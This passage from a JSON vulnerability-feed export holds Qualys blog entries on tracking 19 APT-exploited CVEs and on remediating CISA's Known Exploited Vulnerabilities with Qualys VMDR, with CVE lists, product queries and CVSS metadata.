"carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "modified": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}